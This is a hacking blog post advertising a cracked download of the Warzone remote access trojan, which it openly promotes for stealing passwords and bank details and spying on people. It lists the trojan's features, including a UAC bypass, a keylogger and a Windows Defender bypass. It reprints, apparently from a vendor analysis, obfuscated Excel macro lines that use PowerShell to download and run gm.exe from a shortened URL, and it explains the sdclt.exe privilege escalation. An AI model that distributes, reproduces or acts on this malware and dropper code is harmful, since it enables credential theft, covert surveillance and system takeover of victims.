September 27, 2023
Latest:

Blackhat Pakistan

Hacking Courses and Tools

Warzone Rat Cracked Download 2021
All About HackingBlackhat Hacking ToolsCracked softwaresHackingProgrammingRatUncategorized

Warzone Rat Cracked Download 2021

Villain Hacker 0 Comments , , , , , ,

Warzone Rat Cracked Download 2021 Warzone is Computer Powerful RAT ( Remote Access Trojan ) To control Computer and Steal Password or Bank details or To spy on someone Warzone Rat Cracked Download 2021.

The Warzone developers rent out several products on their website:

  • RAT
  • Rat Poison
  • Crypter
  • SILENT.doc exploit
  • SILENT EXCEL Exploit

Features : 

  • Native, independent stub
  • Remote Desktop
  • Hidden Remote Desktop – HRDP
  • Privilege Escalation – UAC Bypass
  • Remote WebCam
  • Password Recovery
  • File Manager
  • Download & Execute
  • Live Keylogger
  • Offline Keylogger
  • Remote Shell
  • Process Manager
  • Reverse Proxy
  • Automatic Tasks
  • Mass Execute
  • Smart Updater
  • HRDP WAN Direct Connection
  • Persistence
  • Windows Defender Bypass

    The malicious XLS

    The XLS used in the attack uses Excel 4.0 Macro, also known as XLM Macro. The XLM Macro feature has been part of Microsoft Excel for a long time, but we’ve seen a spike in its malicious usage for a few months now. Malware authors exploit this feature of Excel, which allows formulas to be written using macros.

    When we got hold of the XLS on November 11, only a few of the anti-malware vendors could detect it on Virustotal (see figure 3). Warzone Rat Cracked Download 2021

figure 3: Detections on Virustotal.

In the XLS file, the macros are implemented as formulas in a hidden sheet and are not visible if the XLS is opened. The macros are visible only after unhiding the sheet. The following screenshot shows the unhidden sheet with macro code embedded in the formula.

Figure 4: Macro on an open sheet.

Here is the macro code in the appropriate rows and columns:

Row 596 column E – = CHAR (99) and CHAR (109) and CHAR (100) and CHAR (32) and CHAR (47) and CHAR (99) and “powe ^ rshell -w 1 (nEw-oBje`cT Net.WebcL`IENt ). (‘Down’ + ‘loadFile’). “” “” Ask “” “” (‘https://cutt.ly/agJgRCy’,’gm.exe’) ”
Row 597 column E – = CHAR (99) & CHAR (109) & CHAR (100) & CHAR (32) and CHAR (47) and CHAR (99) and “powe ^ rshell -w 1 stARt`-slE`Ep 20; Term-Into “” gm.exe “” -Destination “” $ {enV`: appdata} “” ”
Row 598 column E – = CHAR (99) & CHAR (109) & CHAR (100) & CHAR (32) and CHAR (47) and CHAR (99) & “powe ^ rshell -w 1 stARt`-slE`Ep 25; cd $ {enV `: appdata}; ./gm.exe”
These macros are responsible for downloading and making Warzone RAT. Warzone-paid uploads completely control the system after passing the UAC and stealing information and monitoring the victim’s machine.

Here’s how the attack goes: Warzone Rat Cracked Download 2021

Warzone Rat Cracked Download 2021
Warzone Rat Cracked Download 2021

Macro in XLS file uses PowerShell to download and create gm.exe, which is Warzone RAT
Gm.exe transcends UAC to operate at the highest level of integrity
Gm.exe will copy itself to% programdata% with the name Images.exe and use it. Image.exe runs at a high level of integrity
The image below describes the movement of the attack. Warzone Rat Cracked Download 2021

Warzone RAT Payment: Win UAC
Warzone RAT (gm.exe) is a 32-bit application and uses sdclt.exe to bypass UAC and operate with higher rights. Sdclt.exe is a built-in Windows utility used to backup and restore purposes. Sdclt is designed to assert its own rights and uses the binary control panel, control.exe, to backup and restore control panel settings.

Warzone Rat Cracked Download 2021

There are too many UAC transfer modes that do not work in Windows 10 due to default file system restrictions. The 32-bit application cannot access the traditional directory c: \ windows \ system32 because the application redirects the application to c: \ windows \ SysWOW64. Sdclt.exe and other UAC binaries for bypass 64-bit applications and are not available in the SysWOW64 directory.

However, the operating system provides a way to disable file system redirecting using the Wow64DisableWow64FsRedirection API. Warzone, therefore, uses the Wow64DisableWow64FsRedirection API to disable file system redirect access to sdclt.exe which resides in the system32 archive (see Figure 6, below).

figure 8: Images.exe run at a high level of integrity.

Warzone RAT can steal passwords from the following browsers:

  • Google Chrome
  • Epic Privacy Browser
  • Microsoft Edge
  • Opera
  • Tencent QQ Browser
  • Brave Browser
  • CenterBrowser
  • Blur
  • Torch Browser
  • Slimjet Browser
  • Holds passwords stored on a database. The following screenshot (Figure 9) shows a query used to extract data from a browser.

Just click on the download button below also checkout Subscribe to our Youtube Channel Blackhat Pakistan Here. Dark web links 2021. Also checkout the Project Blackhat Website. if face any problem in downloading or any other error please Comment below we will fix it. also checkout our Courses Here. max bulk mailer pro with key also checkout our hacking full course in Hindi here. Checkout our Latest post here.

 

Join Blackhat Pakistan

You May Also Like

BERLINER BANK VISA CARD PSD TEMPLATE 2023

BERLINER BANK VISA CARD PSD TEMPLATE 2023

arc black 0
Hacking web authentication – part 1

Hacking web authentication – part 1 by Blackhat Pakistan

Ahmad Khan 0
CADA Risk Assessment with CSET 2023

SCADA Risk Assessment with CSET 2023

arc black 0

Leave a Reply

Your email address will not be published. Required fields are marked *